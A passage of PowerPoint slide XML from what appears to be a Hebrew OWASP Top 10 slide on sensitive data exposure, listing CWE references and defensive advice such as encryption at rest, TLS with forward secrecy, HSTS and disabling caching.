                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-220</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>: Exposure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>sens.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t> information through data queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>לכל הפחות, התייעץ עם המקורות הבאים:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>סווג מידע בעת עיבוד, אחסון ובעת תעבורה ברשת ע"י היישום. זהה איזה מידע נחשב רגיש בהתאם לחוקי פרטיות, דרישות רגולציה או דרישות עסקיות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הטמע בקרות בהתאם לסיווג המידע.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אל תאחסן מידע רגיש שלא לצורך. היפטר ממידע רגיש כאשר אין בו עוד צורך או יישם בקרות מעולם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tokenization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או אפילו </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>truncation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. לא ניתן לגנוב מידע אשר אינו נשמר לאורך זמן.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>וודא כי כל מידע רגיש מוצפן בעת אחסון.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הבטח כי מיושמים אלגוריתמים, פרוטוקולים ומפתחות הצפנה סטנדרטיים ועדכניים</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> יישם תהליכי ניהול מפתחות הצפנה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הצפן כל מידע בעת תעבורה ברשת באמצעות פרוטוקולים מאובטחים דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, תוך שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>perfect forward secrecy (PFS) ciphers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, תעדוף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ciphers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בצד השרת והגדרת פרמטרים של אבטחה. אכוף הצפנה באמצעות הנחיות כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP Strict Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בטל  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>caching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עבור תשובות המכילות מידע רגיש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אחסן סיסמאות באמצעות פונקציות  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
